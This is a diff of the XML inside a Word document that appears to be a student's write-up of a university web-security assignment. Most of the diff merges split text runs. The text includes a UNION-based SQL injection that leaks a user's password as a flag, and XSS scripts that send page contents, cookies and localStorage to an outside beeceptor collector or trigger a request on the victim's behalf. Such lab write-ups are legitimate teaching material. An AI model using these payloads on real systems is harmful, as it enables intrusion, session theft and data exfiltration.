                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
+              <w:t xml:space="preserve">' union select NULL,username,password from Users having substr(password,1,32)=BINARY 'FLAG{Wear_some_glasses_minions!}' and </w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -14419,97 +13148,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>NULL,username</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>,password</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> from Users having </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>substr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(password,1,32)=BINARY 'FLAG{</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>Wear_some_glasses_minions</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">!}' and </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
               <w:lastRenderedPageBreak/>
-              <w:t>username=BINARY '</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>prodigysml</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>' limit 1 --+</w:t>
+              <w:t>username=BINARY 'prodigysml' limit 1 --+</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -14537,14 +13177,12 @@
               </w:rPr>
               <w:t>eaks out the password of “</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>prodigysml</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
@@ -14561,21 +13199,7 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>FLAG{</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>Wear_some_glasses_minions</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>!}</w:t>
+              <w:t>FLAG{Wear_some_glasses_minions!}</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -14736,21 +13360,12 @@
         </w:rPr>
         <w:t>`</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t>py</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> sqli.py</w:t>
+        <w:t>py sqli.py</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15118,20 +13733,18 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">  var serializer = new </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
+              <w:t xml:space="preserve">  var serializer = new XMLSerializer();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>XMLSerializer</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -15139,38 +13752,37 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
+              <w:t xml:space="preserve">  var xhttp = new XMLHttpRequest();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
+            </w:pPr>
+            <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-            </w:pPr>
-            <w:r>
+              <w:t xml:space="preserve">  xhttp.open("POST", "https://hermes.free.beeceptor.com");</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">  var </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -15178,20 +13790,18 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>xhttp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
+              <w:t xml:space="preserve">  xhttp.send(</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> = new </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -15199,19 +13809,18 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>XMLHttpRequest</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
+              <w:t xml:space="preserve">    "dom=" + serializer.serializeToString(document) +</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -15219,7 +13828,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>);</w:t>
+              <w:t xml:space="preserve">    "&amp;cookie=" + document.cookie +</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -15238,21 +13847,18 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
+              <w:t xml:space="preserve">    "&amp;localStorage=" + JSON.stringify(localStorage));</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>xhttp.open</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -15260,270 +13866,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>("POST", "https://hermes.free.beeceptor.com");</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xhttp.send</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    "</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>dom</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">=" + </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>serializer.serializeToString</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(document) +</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    "&amp;cookie=" + </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>document.cookie</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> +</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    "&amp;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>localStorage</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">=" + </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>JSON.stringify</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>localStorage</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>));</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xhttp.send</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>();</w:t>
+              <w:t xml:space="preserve">  xhttp.send();</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -15873,7 +14216,6 @@
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -15890,9 +14232,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>!--</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
+              <w:t xml:space="preserve">!-- </w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -15900,6 +14241,147 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
+              <w:t>xss</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>_1</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>.html --&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>&lt;script&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  var xhr = new XMLHttpRequest();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  xhr.onload = function () {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    var xhr2 = new XMLHttpRequest();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    xhr2.open("POST", "https://hermes.free.beeceptor.com");</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    xhr2.send("test=" +</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:r>
@@ -15909,17 +14391,18 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>xss</w:t>
-            </w:r>
-            <w:r>
+              <w:t>this.responseText);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>_1</w:t>
-            </w:r>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -15927,7 +14410,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>.html --&gt;</w:t>
+              <w:t xml:space="preserve">  };</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -15946,7 +14429,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>&lt;script&gt;</w:t>
+              <w:t xml:space="preserve">  xhr.open("GET", "http://assignment-hermes.unimelb.life/pass_probation.php?user=xiandew");</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -15965,319 +14448,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">  var </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xhr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> = new </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>XMLHttpRequest</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
